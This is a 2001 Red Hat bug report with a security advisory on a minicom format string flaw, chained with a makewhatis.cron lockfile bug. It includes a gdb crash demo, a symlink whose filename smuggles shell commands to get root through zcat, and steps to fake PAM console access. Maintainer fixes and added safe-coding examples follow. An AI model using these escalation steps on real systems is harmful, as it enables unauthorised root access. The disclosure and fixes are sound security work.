Bug 35613 - SGID uucp from minicom = format string + setgid uucp + makewhatis.cron bug
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: minicom
Version: 7.0
Hardware/OS: i386 Linux
Priority: high, Severity: medium
Assigned To: Mike A. Harris
David Lawrence
Keywords: Security
Duplicates: 39033
Reported: 2001-04-11 08:04 EDT by Need Real Name
Modified: 2007-03-26 23:43 EDT

Doc Type: Bug Fix
Last Closed: 2001-05-03 18:14:10 EDT
Description Need Real Name 2001-04-11 08:04:14 EDT
[ Pre-release version of advisory for minicom ]
[ If you have gained access to this version   ]
[ and are not someone who is responsible for  ]
[ fixing it, or ensuring that it gets fixed,  ]
[ stop reading NOW!                           ]

[ If you might be someone mentioned above,    ]
[ but aren't sure if you are, then try to do  ]
[ something towards getting it fixed. If you  ]
[ definitely aren't one of the aforementioned ]
[ persons, then WTF are you still reading     ]
[ this for?                                   ]

############################################
  minicom - format string holes since 1997. 

         minicom  ROOT  exploit.

############################################
               zen-parse
############################################
############################################
                SYNOPSIS
############################################

Minicom has a format string bug in its
logging function.
Any user who has access to a setgid uucp 
minicom can potentially gain root access
within 24 hrs, or have console access 
(as determined by PAM) and be able to
cause shutdown of the machine immediately.

affects: Redhat 7.0, almost definitely
         earlier based on dates in sourcecode 
         comments.

         May not be a security hole on other
         distributions. Depends on if it's
         setuid/setgid.

         Root exploit does exist. 
         (I wrote one last night)


############################################
                  details
############################################
[root@clarity src]# whatis minicom
minicom              (1)  - friendly serial communication program
[root@clarity /root]# rpm -qf `which minicom`
minicom-1.83.1-4
[root@clarity src]# ll `which minicom`
-rwxr-sr-x    1 root     uucp       171452 Jan 30 05:54 /usr/bin/minicom*
[root@clarity src]# cd /usr/src/redhat/SOURCES/minicom-1.83.1/src
[root@clarity src]# grep do_log common.c|grep -v "%" 
common.c: *             void do_log(char *)     - write a line to the logfile
common.c: * 27.10.98 jl  converted do_log to use stdarg
common.c:void do_log(char *line, ...)
common.c:void do_log(char *line, ...)
[root@clarity src]# grep do_log updown.c 
    do_log(cmdline);   /* jl 22.06.97 */
                        do_log (trimbuf);
                      do_log(trimbuf);
    do_log (trimbuf);

 
<should be:

    do_log("%s",cmdline);   /* jl 22.06.97 */
                        do_log ("%s",trimbuf);
                      do_log("%s",trimbuf);
    do_log ("%s",trimbuf);

 and others are spread through the code that I haven't checked, but
 should probably be fixed.>

<updown.c contains the code for the uploading and downloading of files.
 cmdline contains the command that it executes to upload and download
 files. Part of the command is of course the filename.>

[root@clarity src]# touch ~/%n
[root@clarity src]# ll ~/%n
-rw-r--r--    1 root     root            0 Apr 11 11:26 /root/%n

<Using root to demonstrate problem so I can gdb the sgid program.>

[root@clarity src]# gdb minicom 
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) r
Starting program: /usr/bin/minicom 
minicom: WARNING: please don't run minicom as root when not maintaining
                  it (with the -s switch) since all changes to the
                  configuration will be GLOBAL !.


<Screen clears... initializing modem message...>

Welcome to minicom 1.83.1

OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n 
Compiled on Aug 24 2000, 10:09:47.

Press CTRL-A Z for help on special keys
                                                     
                                                     
<press ^A S, select xmodem, then move the cursor down to %n, press
 space to tag it and then press return...>

(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x400b7a17 in _IO_vfprintf (s=0x8080a60, format=0xbffff2c0 "/usr/bin/sx -vv %n", ap=0xbffff248)
    at ../sysdeps/i386/i486/bits/string.h:539
539     ../sysdeps/i386/i486/bits/string.h: No such file or directory.
(gdb) q

<Ok, big deal. You get gid uucp if you exploit it.>

[root@clarity src]# cd /var/lock
[root@clarity lock]# ls -Flatrck
total 20
drwxr-xr-x   19 root     root         4096 Apr  5 02:35 ../
drwxrwxr-x    2 root     root         4096 Apr  7 12:10 subsys/
drwxr-xr-x    2 root     root         4096 Apr  9 13:16 console/
drwxrwxr-x    4 root     uucp         4096 Apr 11 11:31 ./

<writable by gid uucp.. ok>
[root@clarity lock]# cat /etc/cron.daily/makewhatis.cron 
#!/bin/bash

LOCKFILE=/var/lock/makewhatis.lock

# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes.  The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "rm -f $LOCKFILE" EXIT
touch $LOCKFILE
makewhatis -u -w
exit 0

< The worst that can happen is someone will exploit this lockfile
  mechanism for root. >

[root@clarity lock]# su uucp
<or run an exploit against minicom.. the gid is the important part.>
sh-2.04$ id
uid=10(uucp) gid=14(uucp) groups=14(uucp)
sh-2.04$ ln -s "/usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz" /var/lock/makewhatis.lock
sh-2.04$ ls -al
total 16
drwxrwxr-x    4 root     uucp         4096 Apr 11 11:41 .
drwxr-xr-x   19 root     root         4096 Apr  5 02:35 ..
drwxr-xr-x    2 root     root         4096 Apr  9 13:16 console
lrwxrwxrwx    1 uucp     uucp           91 Apr 11 11:41 makewhatis.lock -> /usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz
drwxrwxr-x    2 root     root         4096 Apr  7 12:10 subsys
<ok... what is happening? check out /usr/sbin/makewhatis.
                pipe_cmd = "zcat " filename;
if the filename contains shell commands, they will be executed. not
normally a problem, as what manpages have embedded shell commands?
malicious ones, like this. The echo on the end is to prevent it from
returning an error from the command. the export PATH=. is because we
can't put any / characters in the filename. well that will get you root
next time /etc/cron.daily/makewhatis.cron runs. what else ...>
sh-2.04$ rm makewhatis.lock
sh-2.04$ echo -n uucp>console.lock
sh-2.04$ mv console oldconsole
sh-2.04$ mkdir console;touch console/uucp
<now we are at the console (according to PAM anyway). halt anyone?>


************************************************************************
              zen-parse - unemployed computer person. 

                    <CV available on demand - 
                 Could whoever it was who emailed 
              me about that please email again? That's
            not to say any companies who haven't emailed
                  me can't email me this time...>
************************************************************************
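The call-site contrast the report describes, as an added example (not minicom's code): do_log mirrors the stdarg signature the grep output shows and writes into a buffer that stands in for the logfile; count_format_directives is an assumed audit helper showing why a filename only becomes dangerous once it reaches a format argument.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for minicom's logfile: the last line that do_log produced. */
static char last_log_line[256];

/* Same shape as minicom's do_log(char *line, ...) after the 1998 stdarg
 * conversion: the first argument is handed to vfprintf as the format. */
static void do_log(const char *line, ...)
{
    va_list ap;
    va_start(ap, line);
    vsnprintf(last_log_line, sizeof last_log_line, line, ap);
    va_end(ap);
}

/* The updown.c pattern: the transfer command, which embeds a filename the
 * user picked in the file selector, becomes the format string itself.
 * With a benign name it logs exactly what the safe version logs, which is
 * why the bug survives normal testing; with "%n" in the name vfprintf
 * tries to store through an argument that was never passed, the SIGSEGV
 * in the gdb session above. Kept only for contrast; called here only with
 * a plain filename. */
static const char *log_transfer_cmd_unsafe(const char *cmdline)
{
    do_log(cmdline);
    return last_log_line;
}

/* The fix the report proposes: constant format, data passed as argument. */
static const char *log_transfer_cmd_safe(const char *cmdline)
{
    do_log("%s", cmdline);
    return last_log_line;
}

/* Audit helper (assumed, not minicom's): how many conversions a string
 * would trigger if it were ever used as a format. "%%" is a literal. */
static int count_format_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') { p++; continue; }
        n++;
    }
    return n;
}
```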
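For the lockfile half of the report, an added example (not makewhatis's code) of creating a lock in a group-writable directory without following a planted symlink, which is what the script's `touch $LOCKFILE` does; acquire_lock, release_lock and their return codes are assumptions.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Outcomes of acquire_lock (names chosen for this example). */
enum { LOCK_ACQUIRED = 0, LOCK_HELD = 1, LOCK_REFUSED = 2, LOCK_ERROR = 3 };

/* makewhatis.cron does "[ -f $LOCKFILE ] && exit 0" then "touch $LOCKFILE".
 * Both follow symlinks: a dangling link planted by anyone who can write to
 * /var/lock (group uucp here) passes the -f test, and touch then creates the
 * link's target as root, wherever and whatever it is named. Creating the lock
 * with O_CREAT|O_EXCL makes any existing entry, link or file, a failure, and
 * lstat tells the two cases apart so a planted link is reported, not used. */
static int acquire_lock(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd >= 0) {
        close(fd);
        return LOCK_ACQUIRED;
    }
    if (errno != EEXIST)
        return LOCK_ERROR;
    struct stat st;
    if (lstat(path, &st) == 0 && S_ISLNK(st.st_mode))
        return LOCK_REFUSED;  /* symlink in the lock directory: do not touch it */
    return LOCK_HELD;         /* a real lock file: another run is in progress */
}

/* Counterpart of the script's "trap rm -f $LOCKFILE": remove only what
 * acquire_lock created, a regular file; anything else is left in place. */
static int release_lock(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode))
        return -1;
    return unlink(path);
}
```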
Comment 1 Jarno Huuskonen 2001-04-11 17:48:38 EDT
With older minicoms it's possible to do:
minicom -C filename to create a file with uucp group
(Red Hat 7.0 seems to have a patch for this?)

Why not use /var/lock/uucp for uucp locks instead of /var/lock (no need
for group uucp writable /var/lock ?)
Comment 2 Mike A. Harris 2001-04-12 13:33:35 EDT
Thanks very much for the report.  I'm on it.
Comment 3 Mike A. Harris 2001-05-03 18:11:08 EDT
*** Bug 39033 has been marked as a duplicate of this bug. ***
Comment 4 Mike A. Harris 2001-05-03 18:14:05 EDT
By the way, this exploit is not "root by minicom", it is SGID UUCP by minicom.
The makewhatis thing has been fixed for a while, and that would be a totally
different exploit, "root from makewhatis".

Solution is in the works.
Comment 5 Mike A. Harris 2001-05-03 22:44:03 EDT
Fixed in 1.83.1-8 for 7.x releases.  1.83.1-1.0.[56]x for older releases.
Errata release pending.
Comment 6 Need Real Name 2001-05-13 13:54:23 EDT
makewhatis thing fixed?
Well, rh 7.0, updated with up2date is still vulnerable.

Is there like a secret update thing that I didn't hear about that is protecting
everyone?
